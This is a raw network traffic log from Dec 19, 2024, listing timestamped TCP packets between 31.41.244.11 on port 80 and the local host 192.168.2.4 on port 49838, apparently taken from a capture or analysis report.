                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.275578976 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.275623083 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.276583910 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.276629925 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.276760101 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.276962996 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.277729988 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.277782917 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.277784109 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.277828932 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.278758049 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.278814077 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.278872967 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.278918982 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.279849052 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.279905081 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.279978991 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.280082941 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.280946016 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.281045914 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.281047106 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.281090021 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.282064915 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.282123089 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.282181978 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.282269001 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.283113003 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.283171892 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.283220053 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.283354998 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.284204006 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.284252882 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.284311056 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.284360886 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.285278082 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.285329103 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.285382032 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.285434008 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.286350012 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.286406994 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.286478996 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.286559105 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.287501097 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.287535906 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.287553072 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.287569046 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.288542032 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.288660049 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.288718939 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.289622068 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.289680004 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.289753914 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.290218115 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.290752888 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.290807009 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.290852070 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.290930033 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.291802883 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.291935921 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.291958094 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.291975975 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.292880058 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.292936087 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.293005943 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.293057919 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.294018984 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.294068098 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.294128895 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.294298887 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.295084000 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.295135021 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.295207024 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.295253038 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.296260118 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.296315908 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.296387911 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.296519995 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.297259092 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.297306061 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.297379017 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.297422886 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.298363924 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.298413992 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.298490047 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.298541069 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.299437046 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.299490929 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.299576044 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.299628973 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.300540924 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.300592899 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.300636053 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.300688982 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.301604986 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.301660061 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.301733971 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.301826000 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.302696943 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.302748919 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.302824020 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.302877903 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.303812027 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.303872108 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.303930044 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.304058075 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.304874897 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.304929018 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.305002928 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.305226088 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.305975914 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.306032896 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.306094885 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.306253910 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.307130098 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.307184935 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.307187080 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.307235956 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.308132887 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.308187962 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.308226109 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.308270931 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.309261084 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.309320927 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.309391022 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.309463024 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.310323954 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.310374975 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.310447931 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.310605049 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.311444044 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.311496019 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.311595917 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.311649084 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.312525034 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.312576056 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.312634945 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.312696934 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.313651085 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.313714027 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.313772917 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.314059973 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.314699888 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.314754963 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.314819098 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.314870119 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.315773964 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.315825939 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.315886021 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.315937042 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.451530933 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.451606989 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.451657057 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.451771021 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.452053070 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.452106953 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.452223063 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.452277899 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.453152895 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.453207970 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.453210115 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.453264952 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.454226971 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.454282045 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.454353094 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.454406023 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.455382109 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.455434084 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.455487013 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.456384897 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.456444025 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.456506968 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.456561089 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.457536936 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.457592964 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.457654953 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.457701921 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.458698988 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.458750963 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.458760023 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.458800077 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.459677935 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.459732056 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.459805965 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.459851027 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.460752010 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.460869074 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.460935116 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.461839914 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.461918116 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.461957932 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.462006092 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.462953091 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.463044882 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.463083982 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.463154078 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.464027882 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.464174986 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.464222908 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.465125084 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.465186119 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.465231895 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.465289116 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.466196060 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.466254950 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.466309071 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.466375113 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.467291117 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.467345953 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.467406034 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.467456102 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.468401909 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.468453884 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.468516111 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.468570948 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.469485998 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.469537973 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.469588041 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.469641924 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.470561981 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.470614910 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.470669031 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.470721960 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.471656084 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.471775055 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.471816063 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.471837997 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.472759008 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.472812891 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.472863913 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.473845959 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.473897934 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.473900080 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.473953962 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.474922895 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.475050926 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.475107908 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.476026058 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.476079941 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.476140976 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.476188898 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.477118015 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.477174044 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.477247000 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.477296114 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.478241920 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.478308916 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.478313923 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.478358984 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.479281902 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.479337931 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.479394913 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.479446888 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.480376959 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.480469942 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.480513096 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.480525970 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.481456041 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.481517076 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.481573105 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.481753111 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.482558966 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.482609034 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.482659101 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.482707977 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.483680010 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.483730078 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.483791113 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.483844995 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.484751940 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.484875917 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.484925985 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.485814095 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.485866070 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.485925913 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.485977888 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.486916065 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:43.486968994 CET4983880192.168.2.431.41.244.11
